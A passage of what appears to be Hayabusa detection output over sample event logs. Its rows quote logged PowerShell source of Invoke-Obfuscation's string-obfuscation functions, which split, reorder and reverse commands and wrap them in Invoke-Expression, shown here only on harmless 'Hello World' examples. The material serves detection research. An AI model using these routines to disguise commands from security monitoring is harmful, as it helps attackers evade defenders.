This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding( DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [ValidateSet('1', '2', '3')] [Parameter(Position = 1)] [ValidateNotNullOrEmpty()] [Int] $ObfuscationLevel = (Get-Random -Input @(1..3)) # Default to random obfuscation level if $ObfuscationLevel isn't defined ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Set valid obfuscation levels for current token type. $ValidObfuscationLevels = @(0,1,2,3) # If invalid obfuscation level is passed to this function then default to highest obfuscation level available for current token type. If($ValidObfuscationLevels -NotContains $ObfuscationLevel) {$ObfuscationLevel = $ValidObfuscationLevels | Sort-Object -Descending | Select-Object -First 1} Switch($ObfuscationLevel) { 0 {Continue} 1 {$ScriptString = Out-StringDelimitedAndConcatenated $ScriptString} 2 {$ScriptString = Out-StringDelimitedConcatenatedAndReordered $ScriptString} 3 {$ScriptString = Out-StringReversed $ScriptString} default {Write-Error ""An invalid `$ObfuscationLevel value ($ObfuscationLevel) was passed to switch block for String Obfuscation.""; Exit} } Return $ScriptString } Function Out-StringDelimitedAndConcatenated { <# .SYNOPSIS Generates delimited and concatenated version of input PowerShell command. 
Invoke-Obfuscation Function: Out-StringDelimitedAndConcatenated Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString (located in Out-ObfuscatedTokenCommand.ps1), Out-EncapsulatedInvokeExpression (located in Out-ObfuscatedStringCommand.ps1), Out-RandomCase (located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedAndConcatenated delimits and concatenates an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedAndConcatenated ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" (('Write-Ho'+'s'+'t'+' {'+'0'+'}'+'Hell'+'o Wor'+'l'+'d!'+'{'+'0'+'} -Foreground'+'Color G'+'ree'+'n; Writ'+'e-'+'H'+'ost {0}Obf'+'usc'+'a'+'tion R'+'o'+'ck'+'s!{'+'0} -Fo'+'reg'+'ro'+'undColor'+' '+'Gree'+'n')-F[Char]39) | Invoke-Expression .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 1 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) # Characters we will substitute (in random order) with randomly generated delimiters. $CharsToReplace = @('$','|','`','\','""',""'"") $CharsToReplace = (Get-Random -Input $CharsToReplace -Count $CharsToReplace.Count) # If $ScriptString does not contain any characters in $CharsToReplace then simply return as is. $ContainsCharsToReplace = $FALSE ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { $ContainsCharsToReplace = $TRUE Break } } If(!$ContainsCharsToReplace) { # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' If(!$PSBoundParameters['PassThru']) { # Encapsulate in necessary IEX/Invoke-Expression(s). $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } # Characters we will use to generate random delimiters to replace the above characters. # For simplicity do NOT include single- or double-quotes in this array. $CharsToReplaceWith = @(0..9) $CharsToReplaceWith += @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') $CharsToReplaceWith += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') $DelimiterLength = 3 # Multi-dimensional table containing delimiter/replacement key pairs for building final command to reverse substitutions. $DelimiterTable = @() # Iterate through and replace each character in $CharsToReplace in $ScriptString with randomly generated delimiters. ForEach($CharToReplace in $CharsToReplace) { If($ScriptString.Contains($CharToReplace)) { # Create random delimiter of length $DelimiterLength with characters from $CharsToReplaceWith. 
If($CharsToReplaceWith.Count -lt $DelimiterLength) {$DelimiterLength = $CharsToReplaceWith.Count} $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' # Keep generating random delimiters until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($Delim.ToLower())) { $Delim = (Get-Random -Input $CharsToReplaceWith -Count $DelimiterLength) -Join '' If($DelimiterLength -lt $CharsToReplaceWith.Count) { $DelimiterLength++ } } # Add current delimiter/replacement key pair for building final command to reverse substitutions. $DelimiterTable += , @($Delim,$CharToReplace) # Replace current character to replace with the generated delimiter $ScriptString = $ScriptString.Replace($CharToReplace,$Delim) } } # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes = @() ForEach($DelimiterArray in $DelimiterTable) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly choose between a single quote and double quote. $RandomQuote = Get-Random -InputObject @(""'"",""`"""") # Make sure $RandomQuote is opposite of $OriginalChar contents if it is a single- or double-quote. If($OriginalChar -eq ""'"") {$RandomQuote = '""'} Else {$RandomQuote = ""'""} # Add quotes. $Delimiter = $RandomQuote + $Delimiter + $RandomQuote $OriginalChar = $RandomQuote + $OriginalChar + $RandomQuote # Add random quotes to delimiters in $DelimiterTable. $DelimiterTableWithQuotes += , @($Delimiter,$OriginalChar) } # Reverse the delimiters when building back out the reversing command. [Array]::Reverse($DelimiterTable) # Select random method for building command to reverse the above substitutions to execute the original command. # Avoid using the -f format operator (switch option 3) if curly braces are found in $ScriptString. 
If(($ScriptString.Contains('{')) -AND ($ScriptString.Contains('}'))) { $RandomInput = Get-Random -Input (1..2) } Else { $RandomInput = Get-Random -Input (1..3) } # Randomize the case of selected variable syntaxes. $StringStr = Out-RandomCase 'string' $CharStr = Out-RandomCase 'char' $ReplaceStr = Out-RandomCase 'replace' $CReplaceStr = Out-RandomCase 'creplace' Switch($RandomInput) { 1 { # 1) .Replace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- and double-quote. If($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$StringStr][$CharStr]39"" $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } ElseIf($OriginalChar[1] -eq '""') { $OriginalChar = ""[$StringStr][$CharStr]34"" } Else { If(Get-Random -Input (0..1)) { $OriginalChar = ""[$StringStr][$CharStr]"" + [Int][Char]$OriginalChar[1] } } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Delimiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Add reversing commands to $ReversingCommand. $ReversingCommand = "".$ReplaceStr($Delimiter,$OriginalChar)"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. 
$ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = $ScriptString + $ReversingCommand } 2 { # 2) -Replace/-CReplace $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" ForEach($DelimiterArray in $DelimiterTableWithQuotes) { $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Randomly select if $Delimiter will be displayed in ASCII representation instead of plaintext in $ReversingCommand. If(Get-Random -Input (0..1)) { # Convert $Delimiter string into a concatenation of [Char] representations of each characters. # This is to avoid redundant replacement of single quotes if this function is run numerous times back-to-back. $DelimiterCharSyntax = """" For($i=1; $i -lt $Delimiter.Length-1; $i++) { $DelimiterCharSyntax += ""[$CharStr]"" + [Int][Char]$Delimiter[$i] + '+' } $Del",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.249 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. 
Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. 
$ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 2 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString, [Switch] $PassThru ) If(!$PSBoundParameters['PassThru']) { # Convert $ScriptString to delimited and concatenated string and encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString } Else { # Convert $ScriptString to delimited and concatenated string and do no encapsulate with invocation. $ScriptString = Out-StringDelimitedAndConcatenated $ScriptString -PassThru } # Parse out concatenated strings to re-order them. 
$Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptString,[ref]$null) $GroupStartCount = 0 $ConcatenatedStringsIndexStart = $NULL $ConcatenatedStringsIndexEnd = $NULL $ConcatenatedStringsArray = @() For($i=0; $i -le $Tokens.Count-1; $i++) { $Token = $Tokens[$i] If(($Token.Type -eq 'GroupStart') -AND ($Token.Content -eq '(')) { $GroupStartCount = 1 $ConcatenatedStringsIndexStart = $Token.Start+1 } ElseIf(($Token.Type -eq 'GroupEnd') -AND ($Token.Content -eq ')') -OR ($Token.Type -eq 'Operator') -AND ($Token.Content -ne '+')) { $GroupStartCount-- $ConcatenatedStringsIndexEnd = $Token.Start # Stop parsing concatenated string. If(($GroupStartCount -eq 0) -AND ($ConcatenatedStringsArray.Count -gt 0)) { Break } } ElseIf(($GroupStartCount -gt 0) -AND ($Token.Type -eq 'String')) { $ConcatenatedStringsArray += $Token.Content } ElseIf($Token.Type -ne 'Operator') { # If something other than a string or operator appears then we're not dealing with a pure string concatenation. Thus we reset the group start and the concatenated strings array. # This only became an issue once the invocation syntax went from IEX/Invoke-Expression to concatenations like .($ShellId[1]+$ShellId[13]+'x') $GroupStartCount = 0 $ConcatenatedStringsArray = @() } } $ConcatenatedStrings = $ScriptString.SubString($ConcatenatedStringsIndexStart,$ConcatenatedStringsIndexEnd-$ConcatenatedStringsIndexStart) # Return $ScriptString as-is if there is only one substring as it would gain nothing to ""reorder"" a single substring. If($ConcatenatedStringsArray.Count -le 1) { Return $ScriptString } # Randomize the order of the concatenated strings. 
$RandomIndexes = (Get-Random -Input (0..$($ConcatenatedStringsArray.Count-1)) -Count $ConcatenatedStringsArray.Count) $Arguments1 = '' $Arguments2 = @('')*$ConcatenatedStringsArray.Count For($i=0; $i -lt $ConcatenatedStringsArray.Count; $i++) { $RandomIndex = $RandomIndexes[$i] $Arguments1 += '{' + $RandomIndex + '}' $Arguments2[$RandomIndex] = ""'"" + $ConcatenatedStringsArray[$i] + ""'"" } # Whitespace is not required before or after the -f operator. $ScriptStringReordered = '(' + '""' + $Arguments1 + '""' + ' '*(Get-Random @(0..1)) + '-f' + ' '*(Get-Random @(0..1)) + ($Arguments2 -Join ',') + ')' # Add re-ordered $ScriptString back into the original $ScriptString context. $ScriptString = $ScriptString.SubString(0,$ConcatenatedStringsIndexStart) + $ScriptStringReordered + $ScriptString.SubString($ConcatenatedStringsIndexEnd) Return $ScriptString } Function Out-StringReversed { <# .SYNOPSIS Generates concatenated and reversed version of input PowerShell command. Invoke-Obfuscation Function: Out-StringReversed Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-ConcatenatedString, Out-RandomCase (both are located in Out-ObfuscatedToken.ps1) Optional Dependencies: None .DESCRIPTION Out-StringReversed concatenates and reverses an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .EXAMPLE C:\PS> Out-StringReversed ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green"" sv 6nY (""XEI | )93]rahC[ f-)'n'+'eer'+'G'+' roloC'+'dnuo'+'rgeroF-'+' '+'}0{!sk'+'co'+'R '+'noitacsufb'+'O'+'}0'+'{ ts'+'oH-'+'etirW ;neer'+'G'+' rolo'+'C'+'dnu'+'orgeroF- }0{!d'+'l'+'roW'+' olleH}0{ tsoH-et'+'ir'+'W'(( "");IEX ( ( gcI vARiaBlE:6ny ).valUE[ -1..-( ( gcI vARiaBlE:6ny ).valUE.Length ) ]-Join '' ) .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} 3 This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding()] Param ( [Parameter(Position = 0)] [ValidateNotNullOrEmpty()] [String] $ScriptString ) # Remove any special characters to simplify dealing with the reversed $ScriptString on the command line. $ScriptString = Out-ObfuscatedStringCommand ([ScriptBlock]::Create($ScriptString)) 1 # Reverse $ScriptString. $ScriptStringReversed = $ScriptString[-1..-($ScriptString.Length)] -Join '' # Characters we will use to generate random variable names. # For simplicity do NOT include single- or double-quotes in this array. $CharsToRandomVarName = @(0..9) $CharsToRandomVarName += @('A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z') # Randomly choose variable name starting length. $RandomVarLength = (Get-Random -Input @(3..6)) # Create random variable with characters from $CharsToRandomVarName. 
If($CharsToRandomVarName.Count -lt $RandomVarLength) {$RandomVarLength = $CharsToRandomVarName.Count} $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') # Keep generating random variables until we find one that is not a substring of $ScriptString. While($ScriptString.ToLower().Contains($RandomVarName.ToLower())) { $RandomVarName = ((Get-Random -Input $CharsToRandomVarName -Count $RandomVarLength) -Join '').Replace(' ','') $RandomVarLength++ } # Randomly decide if the variable name will be concatenated inline or not. # Handle both and syntaxes depending on which option is chosen concerning GET variable syntax. $RandomVarNameMaybeConcatenated = $RandomVarName $RandomVarNameMaybeConcatenatedWithVariablePrepended = 'variable:' + $RandomVarName If((Get-Random -Input @(0..1)) -eq 0) { $RandomVarNameMaybeConcatenated = '(' + (Out-ConcatenatedString $RandomVarName (Get-Random -Input @('""',""'""))) + ')' $RandomVarNameMaybeConcatenatedWithVariablePrepended = '(' + (Out-ConcatenatedString ""variable:$RandomVarName"" (Get-Random -Input @('""',""'""))) + ')' } # Placeholder for values to be SET in variable differently in each Switch statement below. $RandomVarValPlaceholder = '<[)(]>' # Generate random variable SET syntax. $RandomVarSetSyntax = @() $RandomVarSetSyntax += '$' + $RandomVarName + ' '*(Get-Random @(0..2)) + '=' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder $RandomVarSetSyntax += (Get-Random -Input @('Set-Variable','SV','Set')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + ' '*(Get-Random @(1..2)) + '(' + ' '*(Get-Random @(0..2)) + $RandomVarValPlaceholder + ' '*(Get-Random @(0..2)) + ')' # Randomly choose from above variable syntaxes. $RandomVarSet = (Get-Random -Input $RandomVarSetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarSet = Out-RandomCase $RandomVarSet # Generate random variable GET syntax. 
$RandomVarGetSyntax = @() $RandomVarGetSyntax += '$' + $RandomVarName $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('Get-Variable','Variable')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenated + (Get-Random -Input ((' '*(Get-Random @(0..2)) + ').Value'),(' '*(Get-Random @(1..2)) + ('-ValueOnly'.SubString(0,(Get-Random -Minimum 3 -Maximum ('-ValueOnly'.Length+1)))) + ' '*(Get-Random @(0..2)) + ')'))) $RandomVarGetSyntax += '(' + ' '*(Get-Random @(0..2)) + (Get-Random -Input @('DIR','Get-ChildItem','GCI','ChildItem','LS','Get-Item','GI','Item')) + ' '*(Get-Random @(1..2)) + $RandomVarNameMaybeConcatenatedWithVariablePrepended + ' '*(Get-Random @(0..2)) + ').Value' # Randomly choose from above variable syntaxes. $RandomVarGet = (Get-Random -Input $RandomVarGetSyntax) # Randomize the case of selected variable syntaxes. $RandomVarGet = Out-RandomCase $RandomVarGet # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += '$OFS' + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""''"" $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize the case of selected variable syntaxes. 
$SetOfsVar = Out-RandomCase $SetOfsVar $SetOfsVarBack = Out-RandomCase $SetOfsVarBack $StringStr = Out-RandomCase 'string' $JoinStr = Out-RandomCase 'join' $LengthStr = Out-RandomCase 'length' $ArrayStr = Out-RandomCase 'array' $ReverseStr = Out-RandomCase 'reverse' $CharStr = Out-RandomCase 'char' $RightToLeftStr = Out-RandomCase 'righttoleft' $RegexStr = Out-RandomCase 'regex' $MatchesStr = Out-RandomCase 'matches' $ValueStr = Out-RandomCase 'value' $ForEachObject = Out-Rand",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:15:55.249 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"imiter = '(' + $DelimiterCharSyntax.Trim('+') + ')' } # Randomly choose between -Replace and the lesser-known case-sensitive -CReplace. $Replace = (Get-Random -Input @(""-$ReplaceStr"",""-$CReplaceStr"")) # Add reversing commands to $ReversingCommand. Whitespace before and after $Replace is optional. $ReversingCommand = ' '*(Get-Random -Minimum 0 -Maximum 3) + $Replace + ' '*(Get-Random -Minimum 0 -Maximum 3) + ""$Delimiter,$OriginalChar"" + $ReversingCommand } # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. $ScriptString = '(' + $ScriptString + $ReversingCommand + ')' } 3 { # 3) -f format operator $ScriptString = ""'"" + $ScriptString + ""'"" $ReversingCommand = """" $Counter = 0 # Iterate delimiters in reverse for simpler creation of the proper order for $ReversingCommand. 
For($i=$DelimiterTableWithQuotes.Count-1; $i -ge 0; $i--) { $DelimiterArray = $DelimiterTableWithQuotes[$i] $Delimiter = $DelimiterArray[0] $OriginalChar = $DelimiterArray[1] $DelimiterNoQuotes = $Delimiter.SubString(1,$Delimiter.Length-2) # Randomly decide if $OriginalChar will be displayed in ASCII representation or plaintext in $ReversingCommand. # This is to allow for simpler string manipulation on the command line. # Place priority on handling if $OriginalChar is a single- or double-quote. If($OriginalChar[1] -eq '""') { $OriginalChar = ""[$CharStr]34"" } ElseIf($OriginalChar[1] -eq ""'"") { $OriginalChar = ""[$CharStr]39""; $Delimiter = ""'"" + $Delimiter.SubString(1,$Delimiter.Length-2) + ""'"" } Else { $OriginalChar = ""[$CharStr]"" + [Int][Char]$OriginalChar[1] } # Build out delimiter order to add as arguments to the final -f format operator. $ReversingCommand = $ReversingCommand + "",$OriginalChar"" # Substitute each delimited character with placeholder for -f format operator. $ScriptString = $ScriptString.Replace($DelimiterNoQuotes,""{$Counter}"") $Counter++ } # Trim leading comma from $ReversingCommand. $ReversingCommand = $ReversingCommand.Trim(',') # Concatenate $ScriptString as a string and then encapsulate with parentheses. $ScriptString = Out-ConcatenatedString $ScriptString ""'"" $ScriptString = '(' + $ScriptString + ')' # Add reversing commands to $ScriptString. Whitespace before and after -f format operator is optional. $FormatOperator = (Get-Random -Input @('-f','-F')) $ScriptString = '(' + $ScriptString + ' '*(Get-Random -Minimum 0 -Maximum 3) + $FormatOperator + ' '*(Get-Random -Minimum 0 -Maximum 3) + $ReversingCommand + ')' } default {Write-Error ""An invalid `$RandomInput value ($RandomInput) was passed to switch block.""; Exit;} } # Encapsulate $ScriptString in necessary IEX/Invoke-Expression(s) if -PassThru switch was not specified. 
If(!$PSBoundParameters['PassThru']) { $ScriptString = Out-EncapsulatedInvokeExpression $ScriptString } Return $ScriptString } Function Out-StringDelimitedConcatenatedAndReordered { <# .SYNOPSIS Generates delimited, concatenated and reordered version of input PowerShell command. Invoke-Obfuscation Function: Out-StringDelimitedConcatenatedAndReordered Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: Out-StringDelimitedAndConcatenated (located in Out-ObfuscatedStringCommand.ps1) Optional Dependencies: None .DESCRIPTION Out-StringDelimitedConcatenatedAndReordered delimits, concatenates and reorders the concatenated substrings of an input PowerShell command. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptString Specifies the string containing your payload. .PARAMETER PassThru (Optional) Outputs the option to not encapsulate the result in an invocation command. .EXAMPLE C:\PS> Out-StringDelimitedConcatenatedAndReordered ""Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green"" ((""{16}{5}{6}{14}{3}{19}{15}{10}{18}{17}{0}{2}{7}{8}{12}{9}{11}{4}{13}{1}""-f't','en','ion R','9 -Fore','Gr','e-Host 0i9Hello W','or','ocks!0i9 -Fo','regroun','olo','ite-Hos','r ','dC','e','ld!0i','; Wr','Writ','sca','t 0i9Obfu','groundColor Green')).Replace('0i9',[String][Char]39) |IEX .NOTES This cmdlet is most easily used by passing a script block or file path to a PowerShell script into the Out-ObfuscatedStringCommand function with the corresponding obfuscation level since Out-Out-ObfuscatedStringCommand will handle calling this current function where necessary. C:\PS> Out-ObfuscatedStringCommand {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
